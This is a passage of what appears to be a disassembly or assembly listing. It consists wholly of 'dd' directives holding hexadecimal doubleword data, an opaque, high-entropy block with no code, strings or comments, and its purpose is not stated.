8618FC01h dd 8CB5FE3Ch, 465239E0h, 3095C290h, 0E463DE76h, 8241993Dh dd 9A8B9871h, 0F79D02A7h, 4A53C21h, 1AEC9382h, 2337366Eh dd 4588BF2Fh, 0CDD32EF5h, 409E0A3Fh, 0C9900788h, 682D5CDCh dd 740F06B7h, 35547AF2h, 8CB79F4Ah, 0BEC81FD7h, 4C438E63h dd 4FEE5FE8h, 0D15A719Eh, 0C8ADD2D8h, 0BBDE4DC4h, 0E049CA7Ch dd 0F23A73BDh, 0ACB5F2EEh, 4D9FFA6h, 108362C8h, 89B09668h dd 280D1D1Ch, 41B1EE81h, 2034B7F0h, 1E8756BEh, 0EDD85404h dd 64334051h, 20A13C5Eh, 0E9402489h, 889DBD88h, 0B2CE712Ch dd 66298A7Dh, 0BCB6E195h, 0B42DB2DEh, 9393BEACh, 9B228529h dd 9801E47Bh, 17FDAE5Ah, 0E4F56471h, 7F169B2h, 81670680h dd 82DF3FBh, 998E471Ch, 30C1141Ch, 0C36A0B50h, 4861AA79h dd 1D6C4E54h, 2547136Ch, 209348A4h, 0ED5A72F2h, 84634006h dd 144E4ADFh, 9C0F941Dh, 0A8D8CA65h, 126AEC4h, 0C069A38Dh dd 0DEFA4B39h, 3015C211h, 1B1C2BFAh, 0CFA75749h, 0F37FF688h dd 84F12E2h, 84F78F34h, 74E91A03h, 2CB627B8h, 0CE10CD9Eh dd 0C5532E52h, 5020DAFEh, 88640608h, 97EF62BCh, 64B47831h dd 0D999FF72h, 44F8B35h, 67F5921Dh, 0B4FD3449h, 337341AAh dd 0AC41D9C5h, 0E158C246h, 0CA884B99h, 1F99DAF2h, 0FCA8E425h dd 0F7A5777Eh, 43277C8h, 1C41811Ah, 2C301663h, 36F2A739h dd 0B1AD2E94h, 40297B15h, 26072C21h, 0A7D738EFh, 749C5029h dd 8F89E98Ah, 7D5FF257h, 59E8226h, 84C5E561h, 0F2B9F0C2h dd 52E259C3h, 3D45A260h, 8496B1ECh, 5DE1CAFBh, 0CCB15A75h dd 755396h, 0BB41458h, 196E5Ah, 0EACC5800h, 4C912647h dd 1A018B63h, 8DDC2A7Ah dd 3C0F28A2h, 550543B7h, 0D944B12Eh, 7097DD37h, 4570C70h dd 7825722Ah, 110C2D5Eh, 90D1B5D0h, 88ABD225h, 0EAB537FBh dd 0BB7BAE54h, 8472B0A4h, 2C06D2C4h, 0D9DFD0A6h, 0F661946Eh dd 0B43AE900h, 1D7FFE3Ch, 2DC3E9h, 30DF05E5h, 705BE592h dd 137F9BDDh, 24ED320Eh, 61D33EECh, 70D97C94h, 7C4176A6h dd 4D18476Ch, 5173560Ah, 0F3FC5A8Ah, 0C5E8CCCAh, 0CF75B2C0h dd 9A790BA3h, 7490AA3Ah, 0BCDFB654h, 9FFDC2ACh, 0DEEE31C7h dd 6B49CA5Dh, 0FC0276BDh, 1BE598FEh, 97A95D7h, 1084E2CBh dd 39691668h, 7F1D2852h, 0AD1BBFBh, 843A3AC2h, 476C16ACh dd 58555506h, 0C49ED33Ch, 27F17A14h, 762A898Bh, 0D8D9299h dd 190FF0B4h, 0B016D2F7h, 3C522510h, 0B8C5A2CBh, 85D43321h dd 1E4ACA6Ah, 8A7ED622h, 0EE681D45h, 77CBFEDBh, 2FE7FA4Ah dd 81998D11h, 80A5AFBh, 0D60EAE1Ch, 50C15F44h, 0C3651C50h dd 5F1F2379h, 23B647B7h, 0EBE3B123h, 0E1194D3Fh, 689A3A03h dd 3D78D8Ch, 0C3F861ADh, 0A2F503D7h, 155DA2E6h, 0B4BBBBB3h dd 0A853CE93h, 0CC47B350h, 0E6BF47D1h, 5963DEECh, 0F0A1AB8Dh dd 3B6E8298h, 18536DE3h, 141B0E34h, 676CDC02h, 2CB73691h dd 0C77B3A77h, 0C4D6F993h, 50215A2Fh, 16F5608h, 65BD6614h dd 1AAB21AEh, 0A037151Dh, 0E007E02Fh, 0B990F467h, 0D0E3D1FCh dd 90F4C7C3h, 0DF7FD90Ch, 0AA48AE23h, 0B18FAF66h, 0C0C3D7C3h dd 0CCB7C690h, 8D16D231h, 76569321h, 62606D3Ah, 3DA1738Ch dd 4DCF28BBh, 40054BE8h, 334A5F3Eh, 24273F4Ch, 21A5228Fh dd 0CD3F9Ch, 90FAAh, 1D4B153Dh, 0A821F648h, 0FABAFA87h dd 0C7C7F3A6h, 0A15A86AAh, 0CC24E554h, 0AA7AD64Fh, 0BC80EA9Dh dd 0BDCBF6A4h, 861CC2EFh, 9D25CE00h, 2C6D9255h, 7E886020h dd 71C774EEh, 57E770F9h, 4771634Ah, 66B5F59h, 20BA480Bh dd 74DE3CB1h, 40EC28C3h, 40220909h, 1157141Eh, 0F7971069h dd 0FF82AAE5h, 0BCAEF3C5h, 0C17DD63Fh, 0DD5F8E37h, 0E0D8DF7Fh dd 0BFE0B2A9h, 0ACF4BE8Eh, 45CBFF19h, 0F584A6E8h, 0E8D69E4Dh dd 0F14D1240h, 0B9DC6EDAh, 347A781Bh, 0A5D036F6h, 0F4594A42h dd 8B48FC80h, 528B510h, 0BCD7AB7Fh, 0DB6FE06Dh, 740BB69Ch dd 80D97AF2h, 8CA786C0h, 9875928Eh, 0A4439E5Ch, 0B011AA2Ah dd 0BCDFB6F8h, 0C8ADC2C6h, 0D47BCE94h, 0E049DA62h, 0EC17E630h dd 0F8E5F2FEh, 4B3FECCh, 10810A9Ah, 1C4F1668h, 281D2236h dd 34EB2E04h, 40B93AD2h, 4C8746A0h, 5855526Eh, 0E7435E3Ch dd 60B3D2AFh, 0D93C76D8h, 889DC01Ah, 0D7EC8174h, 0B87A1756h dd 0AABC111Fh, 0FC4E62DDh, 86B89A88h, 0EB78B876h, 0C85CDE0Ah dd 0C3E9A09Dh, 6142E2A6h, 89B80Ah, 4EDB8309h, 1DDE125Eh dd 0C62BDC9Fh, 34134B33h, 631ABEB8h, 0A06D52A2h, 543B4E30h dd 60097A4Ah, 0E052EBF0h, 21A5629Dh, 880766B5h, 72454AD9h dd 88A69DFh, 6BDDB2B4h, 39A87733h, 0C0699ECDh, 0BCB8D683h dd 5B155DD2h, 1201DA14h, 0D33D7743h, 0C6FCF688h, 23487666h dd 4690D06h, 7815548Fh, 1634788Bh, 0C781469Eh, 0BB50D55Eh dd 7C95A48h, 7710A9F7h, 0D4304918h, 2C8B7EE6h, 436D3171h dd 0CEBF03CFh, 1D32921Eh, 0A4D3DC48h, 0B091AAAAh, 0BC5F8A90h dd 5CA84946h, 3CFBDE56h, 1F362C4Bh, 0EC97FE58h, 6CD8717Eh dd 433EE0Eh, 8D88026Fh, 1CDF32E0h, 0A562BE5Dh, 347B6C10h dd 0D8BCB591h, 0C5075662h, 4897C67Bh, 64A0B6BCh, 0B9426A8Ah dd 0FCACFD9Bh, 0DA0D8226h, 6B25631Ch, 1C3C993Dh, 0AF77B6D2h dd 0B43F3188h, 0C397B12Ch, 53E1CAFBh, 0D3AFC6B2h, 0E87D1F12h dd 0F8096564h, 0FED11262h, 89E4F9FFh, 18A55072h, 0AED3D89Fh dd 30A8AA62h, 0C59F2F4Ch, 8EE3628h, 1C30BF3Fh, 0BF68DBA3h dd 0ED88B9AFh, 346936C7h, 0DD1F0B0Ch, 694242F1h, 2B009952h dd 0CE5DA276h, 87D5D6C5h, 6B7CB520h, 9AC7C6E0h, 0AD95E82Dh dd 0F4295579h, 0FABAE8A1h, 14AE071Bh, 0F732FC94h, 5627BBB7h dd 0A5C41A92h, 23CC5E90h, 3805B69Ah, 0F866C1ECh, 0A15AF8h dd 0A3910360h, 0D4B861A9h, 0FB0B7E66h, 909BC677h, 0A8A385C0h dd 9AB511DDh, 124C456Fh, 30034922h, 7D8C9631h, 0E1A9E6E2h dd 0D852EA88h, 0B098146h, 0E3EC67D9h, 8C384929h, 0AC487FF2h dd 645A64DFh, 45B4975Eh, 5CE2830Dh, 0E210AF2Ah, 34158FF0h dd 0DF7CC786h, 2CA60A87h, 19D8DF22h, 40232E3h, 3A44F7CEh dd 0FC6CA799h, 0A4A00F7Ah, 0D4C8BF7Dh, 34625916h, 0E3C5A29Ch dd 3B6CCF45h, 12E29485h, 22C03F5Ch, 0E93E1DE9h, 1C93EA8Eh dd 0FF660FFBh, 2A5E9308h, 0A053125Eh, 0C601062Dh, 32D2CE2Ah dd 5634505Ah, 66851A80h, 0D7C4B1A1h, 0B18E52E0h, 848F639Ah dd 875A879Fh, 0F770840Ch, 92113A51h, 8C29AFADh, 8F3608F6h dd 1EF3C6AEh, 0B57A4012h, 24567678h, 27EA272Fh, 0E4E3DF44h dd 84636ECAh, 29F2795h, 0E3BBE9ACh, 141BB631h, 0C2429A02h dd 0B93AE56Fh, 38950B0Eh, 9EA4E947h, 0D4A4BDF9h, 5CEF4631h dd 67B562D6h, 944AAE31h, 2DC8C79h, 8D279679h, 9593947Bh dd 0B728BB55h, 89132F5Ch, 0C95DB668h, 0F920A440h, 0B2FF2531h dd 86ECDBEFh, 132B0E1Bh, 0BBEE0D81h, 0A8A67778h, 0BB011A58h dd 984AE12Bh, 289D328Fh, 3B632E84h, 0FC3DFAC7h, 0B39BAE8Ah dd 0CD5CAD11h, 64B31C0Ch, 49F3EF7Ch, 93E7648h, 633C8D22h dd 3F1BA5F6h, 242C6D01h, 0AC77B6A9h, 0CC4DB25Eh, 0BA96340Bh dd 11E1DAC3h, 0D1C9DD28h, 431BA71Dh, 7EE116D4h, 102084B7h dd 1707C700h, 91D175CBh, 0E4B0B59Ah, 22BA810Ch, 39905280h dd 0CD67E906h, 54AB77AAh, 804802A6h, 0AA94CD68h, 6802E6BBh dd 0A118770Ch, 0B02A766Ah, 9C642ECEh, 0B1B60910h, 5C73AA2Eh dd 3F064E1Bh, 0D15C26Dh, 0DDF3DA4Eh, 4F051EF5h, 6081E9A1h dd 0A4DE9CB2h, 0F73EF20Eh, 801E8E4Bh, 26690AA5h, 5F3FDCD0h dd 4CD7B631h, 3019C02Fh, 246BB479h, 28A5A84Fh, 1CF79C8Fh dd 0C19028h, 0F41384FDh, 675E36CFh, 32F22245h, 60A845ECh dd 70FA5F9Ah, 344E48h, 4C283505h, 0D47BDEADh, 5049DA42h dd 0E81593B6h, 6AA7FFAh, 3DCF5B46h, 0BBE70A8Ah, 694AEAE8h dd 0A81D9231h, 9EABD14Bh, 0BF46583Ah, 0C802B15Fh, 58554257h dd 2235E7Ch, 5C00CB2h, 1A96C2DAh, 8295320Dh, 8462F0F1h dd 0A3C95A42h, 53CA4EBAh, 30754D21h, 0FD173B5Bh, 5061CA6Ah dd 0DE5AD648h, 4D7764A6h, 0F4DBD798h, 0FC1951D4h, 0BC607385h dd 0E77A924Eh, 0A9C0B45Ch, 20E8BA57h, 0C392DEB8h, 0CD9ABD79h dd 542B77D0h, 70095A22h, 0C676584h, 0FC208514h, 84736EB5h dd 0E4498A5Ah, 175A2E2Fh, 0E776A21Ah, 8D2F2B33h, 0C07ABA82h dd 4848C760h, 0D815D2DEh, 4F49364Ch, 0B22D5743h, 3097F688h dd 0B8B2FD98h, 9DB0A4DCh, 30ABBABFh, 0D20ACED0h, 0BD72CD61h dd 444307E8h, 50214A39h, 0D9184C7Ch, 68AD5B52h, 758B6EA4h dd 0AEB17006h, 64D879BEh, 670A6C95h, 0F69776Ch, 0F20D2F21h dd 73D4B668h, 75A40A6Dh, 0D4EB8CB0h, 5835926Bh, 0DA6882D7h dd 9EA5C1D5h, 80B609E7h, 13011A23h, 68CF16E8h, 0AA18D4A5h dd 0B46B3EBDh, 0EAD13026h, 0A4F8B9DDh, 0A72AACB5h, 0EDC73904h dd 0B042C1ACh, 0F9C8DD3Eh, 881DBBA2h, 94DB8EF7h, 255FC0B6h dd 0AC679F12h, 504FC7DEh, 3BEC43ADh, 2F1FF812h, 21AD3E37h dd 0C8CD1D69h, 0BB0FA8Ch, 662019CDh, 6AF2F9B8h, 931E8365h dd 34BA9A09h, 0C783DD6Ah dd 3C1F35FAh, 0A0F93706h, 0AB44B208h, 8E614512h, 0AA8998Ah dd 1E308D86h, 0F58EFA7h, 34440115h, 0B78F86EAh, 54152BBEh dd 8DAF2BB3h, 0C0FABA02h, 0F4B3C6E0h, 0E1115759h, 0E463DE6Ch dd 0DC45EC4Ah, 0C57B73EFh, 8CD02F6h, 1EEE0FB4h, 0DF94D86Ah dd 0D17CCEAFh, 0BDF2CDE1h, 44C30768h, 54A14ABAh, 0F0875CFCh dd 80C29DABh, 8BF49345h, 0B95DFF05h, 8CA386D0h, 8F01928Eh dd 5BBE08B4h, 703812D5h, 4747E06h, 0CCD902CEh, 2C0E763Fh dd 8E2BD89h, 13E81B4Fh, 0C1617709h, 4BBFEDCh, 62F40A9Ah dd 25CDABE8h, 5C1D2226h, 0C98EC66Dh, 6901C52Dh, 464E6FB8h dd 486C2CCBh, 67C79E3Ch, 498FCF00h, 941476C8h, 77727FEDh dd 1EF13FC4h, 0B01018C7h, 901F0C10h, 0B73A4D23h, 0FDED3B1Ah dd 0D4ECCA6Ah, 1D6FD288h, 654DEAF6h, 0F57B4582h, 2071AD18h dd 2598F97Dh, 0A0533672h, 0D35AE5FEh, 20E8AE6Fh, 3C9F26B8h dd 0F86A3686h, 0EC5DE41Dh, 810BA057h, 903FCD96h, 0C85A8D42h dd 4440D464h, 18FC03F1h, 6B0F866Ah, 0B8E42673h, 0B4AB8EC4h dd 976ECF92h, 33BB1888h, 179E88D1h, 2EC8864Ch, 0C9CD6FC0h dd 0B6F6F688h, 0C0A5A89Ah, 72E4F1C8h, 0D7299BBAh, 3C8EA255h dd 3885729Eh, 0C4504A6Ch, 0F52B62FEh, 5CFF6F74h, 0D534C9B0h dd 749B2C28h, 4DC8DD9h, 8C279679h, 0EDB5920Eh, 0A6932ED5h dd 0A0A8D62Fh, 39A81C78h, 0C83DFBC2h, 0D4FBCE94h, 5879D197h dd 0D5EA63BAh, 13CFF26Eh, 358B9871h, 9484FD02h, 1CCF06D1h dd 5C9D22B7h, 3E429E86h, 500047F7h, 4FE38620h, 61A8F7E4h dd 0CFC55EACh, 80F0D2ECh, 45BBF3AFh, 8A0D8236h, 96AE8EF4h dd 5A35276h, 0AC679FEDh, 5CC1938h, 0C403FC84h, 0D0C85A42h dd 59587DC8h, 0E86DDB12h, 0F44BEE6Ch, 20F18B46h, 0FB18F9FCh dd 88C964Bh, 24871E9Ch, 805A5F6Ah, 429A3C80h, 0E2ED523Fh dd 0D14C033Fh, 60996326h, 6C576E70h, 0C043634Bh, 21F99E8Fh dd 90D1B3A4h, 5CBC3DCEh, 0CE4849DCh, 0BE3387FCh, 0D0C0C4B7h dd 0CF2306E0h, 0E1EB77A4h, 4F05DE6Ch, 0C9B56FBDh, 0ECFFF608h dd 0B0AB02E6h, 17EFCE35h, 2A61DE02h, 3C0E58F5h, 37AE541Eh dd 7D51BB5Ah, 0B80A4AAAh, 0A390AD27h, 51B9E7A1h, 740B6E34h dd 8EAD3AF2h, 9A5D670h, 9865ABF2h, 5FD676F6h, 0FF9C55D5h dd 2C523F06h, 3FADD284h, 0C4424A11h, 0E049DA62h, 5C1B92B0h dd 714E5816h, 14F14A71h, 0F884E19Ah, 0E3B0ED89h, 0D7E648DEh dd 0B06ED9FBh, 40B92AEBh, 398747A0h, 5215E265h, 741A22B9h dd 7F1AC00Ah, 0BC3CCEBEh, 0B1F127ACh, 3F3D8E64h, 57839BF2h dd 0BCCE2295h, 0BAC5B2DEh, 33BCCBACh, 0C0584EFFh, 0D82FD648h dd 58E79716h, 8A4EE424h, 8A99EA8Bh, 1C5E8525h, 8D5D34Eh dd 0A565A67Ah, 0DBD19A41h, 36DF86B0h, 58543C03h, 0D1CCE454h dd 601963A6h, 6CDF66F0h, 0C0C362CBh, 2179960Fh, 9051B327h dd 9DBF3D4Eh, 0E06DAA1Dh, 8DD62BCEh, 28D3BA82h, 33B83CBFh dd 0E19157D9h, 0E4E3DEECh, 8500EADAh, 4419D3EDh, 0AD47FAE5h dd 140B3749h, 0E0DAB164h, 0BC0A0F7Ah, 0CF8522DCh, 546ABAE9h dd 70214A3Ah, 0EDF02308h, 0EA689A1h, 7E93671Ch, 906007D7h dd 8FC34640h, 0A1883704h, 0FA59ECCh, 0F2011783h, 7DD5B668h dd 8ABD67CCh, 7F9DCE04h, 65CB8252h, 0EC87DFCCh, 21C1AD4h dd 81C401B3h, 1011339Eh, 1DCF16EBh, 0AD6A0EC2h, 347B1700h dd 44393A52h, 0C9F06655h, 58C56B6Ah, 67A35EBCh, 0AE9960FFh dd 94C089A1h, 77F2786Dh, 6B218E1Ch, 5AE8723Dh, 2980596Fh dd 0B8558BDAh, 0CC13BE2Ch, 1951C28Eh, 26823E62h, 6D8A1D69h dd 0F45BD7E0h, 1019FA32h, 0B572C74h, 21C997E4h, 0C4421E8Ch dd 38D82770h, 991D361Ch, 48FD7B7Ah, 0D4B8AA14h, 88225E66h dd 93A89F8Fh, 908F138Eh, 7B0C87FBh, 703E32BCh, 0A5F333A2h dd 33BA266h, 4BD248ACh, 447C4DEDh, 0ECC7D6D9h, 0AC95D2AEh dd 6FA45538h, 0E07362C7h, 753EDD18h, 507DFEA7h, 2DE78BBEh dd 0C8C31A92h, 0D3C8DFEFh, 181B7E9h, 44D33EFCh, 5CD54AFAh dd 9F3FEEEEh, 5141E75Ch, 7EE06E34h, 6026C294h, 0B5DB23CAh dd 3313929Eh, 5BBA08B4h, 34945DD5h, 0BFDFA6C1h, 0BCACC2C6h dd 5FB445CBh, 0F00B7AE7h, 65DFCD30h, 31D60EB6h, 3D377B3Bh dd 10810A8Ah, 123A16E8h, 1161A7BBh, 3C612E14h, 4340BA92h dd 480ABED3h, 487116A3h, 6CC39F3Ch, 935AE1BAh, 4D0710DEh dd 0EE26E466h, 0FCDB01CCh, 0A0299AFAh, 7914712h, 71401986h dd 7CF5B8D9h, 7B070A4Bh, 348515F8h, 17021B3Dh, 0CD4F6B13h dd 99FAA2h, 16138680h, 9DBEDDC5h, 24135CA8h, 7858E2C1h dd 0C5E0DE44h, 8BDDBD79h, 0AD3EA6FEh, 0E584A5DDh, 6CC75F60h dd 4121F749h, 84737E9Ch, 9634AA5Ah, 0C4F7BD7Fh, 0FB56BB1Dh dd 9F5385ECh, 68F43142h, 0CD47D622h, 0C8575ABBh, 6FDADFFCh dd 79B5CE8Eh, 0EC6F9E25h, 84F08966h, 3F1B1E76h, 30AB9287h dd 0A832D1D0h, 788522A7h, 30533E6Ch, 0FBF9BD38h, 0AEF52CAh dd 0AC00E181h, 748B7EE6h, 8180FE7Dh, 81CF8640h, 0D3F5920Eh dd 0E18DCC99h, 9EA399E6h, 0BC13FA3Ch, 0F65F57B9h, 5172CE04h dd 0E0D9983Ah, 0D0CF6DE3h, 8B9A2A7Dh, 30707564h, 0EFF413F2h dd 0A45A9D17h, 739D32F4h, 0BD676C87h, 507BE6D7h, 44454520h dd 1A35D767h, 17285EACh, 0F0C295A2h, 943F7658h, 77F276D4h dd 0D663337Fh, 48FF9AD2h, 53885276h, 0FAFD27D5h, 8E98BE3Ch dd 0DCABC9F2h, 352C18E3h, 88F5ED93h, 0FB4BEE65h, 18A0B6h dd 0B0520500h, 1BB5028Ch, 34C16629h, 0D86D866Ah, 3CBDB337h dd 0E604206h, 2C3E65D0h, 63894AE0h, 0CFBF3676h, 0FBDA8DCAh dd 94B1C6B1h, 9BB48ADAh, 9383D193h, 0A85CB9F5h, 8D274544h dd 0D0BB0287h, 0C142C9E0h, 0DB95D2AFh, 0F421A6F9h, 0C8B08C4Ah dd 79F0D3E7h, 8CD021Ah, 3F994E3Fh, 0C8392EC1h, 0D3C8D236h dd 7ABD8F27h, 0C1DC3EFCh, 50A14A5Eh, 1ED3D38Bh, 0ED3E6246h dd 741B2C5Ch, 0C7F27A79h, 412589CCh, 0A375928Eh, 274C961Bh dd 0B011AAEEh, 0BFDD767Bh, 4DAED681h, 0D46B8CECh, 55B68A30h dd 0EC07A4E8h, 0C6D76701h, 81E9FEDCh, 0A704055Ah, 0F54F1668h dd 281D22AAh, 0B1E4D138h, 40B93A46h, 43927820h, 5855D9EBh dd 6565D53Ch, 20C52921h, 834C8330h, 3030BB59h, 0E15B9E36h dd 1CAC9935h, 0AFF7B652h, 0A887CA5Bh, 201637ACh, 5B61DA38h dd 0AAED48h, 9AFDF254h, 144ED5ECh, 7299EAF0h, 0C673BE9h dd 2F47624Eh, 240301F4h, 0CC9FA7EAh, 3EB4F733h, 737D0085h dd 4479AAD1h, 0E3052F22h, 5D287634h, 64813631h, 476895EDh dd 0D2D90FD5h, 176F9638h, 0B89FDA43h, 403846C4h, 6918456Dh dd 4C47C660h, 9F3EDC5Bh, 0DFEAACF0h, 72BEE28Dh, 38009A4h dd 0BAC80D2Fh, 9FE4F1CAh, 87683E3Eh, 2CB70F54h, 0D77ACD61h dd 0ED27C87h, 50212A1Eh, 9CDC18E8h, 0EF996E5Dh, 64C9AA21h dd 40DCF372h, 1279602h, 98DC1AB7h, 0DC469DDCh, 0D691BAE8h dd 971113DDh, 0DC6FC180h, 12F78C3Fh, 272121A4h, 0EC97B531h dd 0F865F77Eh, 0F875774Ch, 47C25445h, 22B18317h, 0C05C22A6h dd 2EEE219Bh, 10393A53h, 262F2C74h, 8640AD11h, 0E1A34E82h dd 0F87E354Ah, 7C3F775Dh, 77E90ECEh, 94CA660Bh, 0C5FA9AC2h dd 0C01EE0E4h, 0DB20E13Bh, 0B07ACC59h, 2FE18B83h, 0CCED9A7Dh dd 0DAE81D96h, 7D4BFE5Ah, 105BAEB7h, 0CFEEE00h, 7DE612CEh dd 41E87FC8h, 553F5D25h dd 5577454Ah, 219F1276h, 31D727A2h, 37893FC5h, 93BF3B98h dd 78369AC1h, 0E1A07E0Ch, 0E4B2EF88h, 0CCEAE4C7h, 0C12BCB04h dd 0D14CCB28h, 0FF11ED12h, 24383908h, 0D895D2BCh, 8521BB2Fh dd 80448129h, 8A968448h, 6FA86E8Fh, 0FCCC0ED1h, 0DF96F2A0h dd 2C373EB8h, 7B60611Eh, 23BD5F84h, 24CE04DFh, 0C1630E1h dd 14B0B24h, 116C0B48h, 7F312DF2h, 0DC587927h, 8F01FDAh dd 0CE438E61h, 0B17BFA4Eh, 564A49AFh, 41ADD2F8h, 4184EAA8h dd 0E059E444h, 519A261Ah, 0F8F5B3B6h, 0FBE3AE9Ch, 0BC9A2Fh dd 1C4E7E68h, 42492232h, 0A1147905h, 40A97886h, 1B832CF4h dd 1A01C791h, 0A0A05E2Ch, 3C44951Eh, 83BF669Ah, 98B3E033h dd 1998D174h, 0B068D2F7h, 3908F010h, 0B8D58CB8h, 0CB6C462Fh dd 0D06171FEh, 84AA5F48h, 82FDF254h, 6134B8E4h, 89C410h dd 8868C605h, 183512EAh, 7453DE37h, 5A812980h, 3C9F5EB9h dd 0B73B8286h, 44050CC1h, 9FF1D922h, 6AD0E2FFh, 0FD2C72BEh dd 84633CD0h, 0D22107D7h, 9829638h, 0A8CDE09Eh, 0B4C1FC95h dd 0AEEC45C2h, 4F47D65Eh, 5C1A2DD6h, 0E4E3DB29h, 454EEAA0h dd 0FC6FB4C4h, 36279799h, 0EC980E24h, 9E6D15FDh, 0A5B726D5h dd 28C7421Bh, 479A0D6Ch, 1711BF9h, 0A3BE5262h, 78FF3E63h dd 321E91A4h, 5596A4Ch, 16A38980h, 0ABF5920Bh, 0D0461715h dd 0E191BAE8h, 0A337E729h, 982DCD46h, 0EA755BEBh, 204CDAF2h dd 0E9C462BFh, 7DECF27Eh, 423BC34h, 62EAB2D9h, 574416E8h dd 0AC18D58Eh, 346B3EBDh, 35193A52h, 24824526h, 6BD542FEh dd 93625D6Eh, 0F9909D7Bh, 6C7DF2DDh, 0A1823A26h, 0DF508EF4h dd 0C82C99FEh, 9F77B680h, 4F84B18Ch, 4DF249DDh, 0C0A3B67Fh dd 6BA015C8h, 0B84E4DDh, 0EC186351h, 145A4D3Dh, 67AED603h dd 0C8B63A0Fh, 53DC241Dh, 44A84403h, 3065B525h, 0C30D3007h dd 1630729Fh, 70CB59B6h, 931F22FDh, 0B906ABC9h, 0C683FB37h dd 1B028ACAh, 0AF9FB2FCh, 10DF2DB6h, 772BAE44h, 0CB127599h dd 8D8F7B6Dh, 5369D2BEh, 48AAEDA3h, 0F6438B76h, 0FE888C24h dd 346722CAh, 28777AE8h, 1CB46EACh, 0CFDF5350h, 504B9D7h dd 449666A9h, 39C41CEh, 536F04CBh, 97C251D3h, 4908E5DBh dd 0C39733A5h, 738102CFh, 0CF486D71h, 0AB0DCB1Fh, 4FEEB1AEh dd 0FF888B07h, 4CA2F0F5h, 2B843184h, 0B41A8A5Fh, 0E993E97Fh dd 0CB1A0D01h, 0FA9E1617h, 0F4F565h, 0E3B3EC80h, 0D63CCAC9h dd 0B0E4D1FBh, 0BF46C43Eh, 5A6F9493h, 0B055526Eh, 9BDCA15Fh dd 70F16AE2h, 913E2BD8h, 889DB6B5h, 9458749Dh, 92D6FE42h dd 0EE8F139Bh, 31A1B2CEh, 0FA12D88Eh, 556E9037h, 0DC2FD5ABh dd 0EBC1BC9Dh, 0CF4A883Ah, 8596BFE2h, 0C670553h, 182351B9h dd 2B031E3Ch, 30D2EC6Fh, 60DCC0B8h, 0F4E94D84h, 0DF3B4E57h dd 0C0345261h, 6377C650h, 78A6DC3Ah, 0A453438Ch, 144EAA7Ah dd 9C0F958Bh, 0A815297Dh, 0A248AEC4h, 2FF152C3h, 4144399Fh dd 0D8059092h, 856010FFh, 9132EA8Ah, 6797F6DCh, 7B2FD98h dd 141874B6h, 0E04C9902h, 2CB73692h, 0B38D7015h, 85782E26h dd 90124E49h, 94EC53E3h, 0E1AD285Fh, 64C9EE21h, 8C137972h dd 8D2786F8h, 261DC30Eh, 943C613Ah, 0A0A8283Fh, 8C7F0778h dd 0D81441F3h, 2ADBA414h, 0F4B1822Bh, 13714258h, 0F7B77781h dd 0E6E03CD8h, 29859F2Bh, 0F92416F8h, 1119A741h, 346B2E94h dd 624D3B52h, 7583C3D7h, 58D652FEh, 68D65EBCh, 49F5CF0Bh dd 83C07648h, 82E679D9h, 0AD5F0375h, 0A0A99AD2h, 0AA1FAE90h dd 0E145B25Eh, 0C413B844h, 860992FAh, 5650292Eh, 0F8449E13h dd 0DECF6864h, 9C34Eh, 359B8388h, 0F85712DEh, 1D079B6Bh dd 30592A7Ah, 356A3638h, 7193FF86h, 20BA4EC4h, 0E40CAD67h dd 6C577649h, 0C2D723Eh, 0F84EFE17h, 95C19AE3h, 210F26DCh dd 0A84D9B0Bh, 348CDA41h, 0D0C0C4AFh, 52B3C3E0h, 0E1115759h dd 0E463DE6Ch, 0F945FA4Ah, 0C5834B98h, 7FCF02F6h, 0D03E8D3Dh dd 20690AC0h, 0D3C580B8h, 0C546DAE1h, 353BC113h, 0DBA14AB8h dd 4C2D2A15h, 0E8A06156h, 9C0B7E66h, 7F2686A9h, 8EF602CFh dd 2DFE928Eh, 0A453DC24h, 0B32DF4A1h, 41835E26h, 4AA23D39h dd 0D47BCCAFh, 806D90E3h, 67F7E630h, 0FBB3A000h, 7EB0EAB6h dd 9404FD8Ah, 1C4F0651h, 5D3D2236h, 0FC56A710h, 0CDB92A90h dd 5CBED615h, 30D8D96Eh, 97234E2Ch, 14483DAEh, 0F1BF76D2h dd 989D8213h, 25FE7D74h, 532B7942h, 287251B4h, 0B8C5A2E7h dd 0CBB3BEACh, 0D06164FEh, 0F45C2948h, 171033FEh, 4C5E651Bh dd 8599EAF0h, 94E30952h, 9335124Eh, 344166A9h, 209BA1EAh dd 5CBB7C39h, 638D4286h, 5648461Eh, 120A9311h, 45A5DE4h dd 0F3A562AEh, 94631601h, 1B17F85Ah, 398CB214h, 0A8CDB29Eh dd 0DC0C2DC4h, 0C079BA92h, 0CD4FBCEBh, 2F16DA64h, 6168297Bh dd 0F0A1A846h, 0C5FB736Fh, 80D0276h, 166F0E34h, 52EA02F5h dd 0A5870FDCh, 28C7F62Bh, 6C20B56Ch, 0D5D67A3Bh, 5CFF6F8Ch dd 68BD6296h, 6C7C6CD0h, 7C729223h, 677E79BFh, 0B0869102h dd 0F5CFECF7h, 0EF3559FCh, 2CEA3B21h, 412DD27Fh, 0C4B906A9h dd 0BF6D29E2h, 7EA6E9EEh, 0F95A75F3h, 9109FE4Ch, 10113398h dd 0CEA6109Dh, 3AA974CEh, 0DD3BA7E2h, 0BFE31DBAh, 68C1CDFh dd 489F51E2h, 5D27DB4Bh, 70716A9Ah, 3DB25658h, 11EF723h dd 84994A79h, 0C82C99C2h, 2F77B680h, 0B845DAF9h, 8738BE2Ch dd 836643D2h, 2BAFD6C8h, 0F842A213h, 0F44BEF64h, 0C71E8E32h dd 0AC470E43h, 9D42B26Eh, 24932718h, 20512A6Ah, 0D44D314Ch dd 0B712B55Dh, 9036C58Eh, 83894AE0h, 441CEF75h, 0F5AE7FD5h dd 84E33CCCh, 932A8839h, 6BA7DD23h, 0B86426F3h, 0B42BAD44h dd 4BEDCE12h, 0DC850E65h, 6818D1AEh, 0E763CE3Eh, 0E07346CFh dd 77F7F718h, 8D4612ACh, 148B4CC8h, 536150BBh, 247DAF53h dd 0BB15701Fh, 0CFD3668Fh, 40E3CE3Fh, 75FF3E88h, 2A3C6256h dd 370A372Ch, 24CF0A2h, 7BA796F9h, 884C160Bh, 0A4439E5Ch dd 0B317DE0Ah, 0ACCFDE75h, 3FAD74C6h, 0C4424A11h, 0E249DA62h dd 12039330h, 7C600538h, 4B3EEF5h, 65810E9Ah, 9FFA9C6Eh dd 0DF1D320Fh, 24D2AA81h, 40F93AD2h, 0C68C33A0h, 0F2975069h dd 93C1883Eh, 777B63E1h, 7E15B4EAh, 0BB7A6070h, 0B6D0EAA6h dd 0F82B1526h, 0EEAB1B93h, 0B7C5B2CEh, 3B690128h, 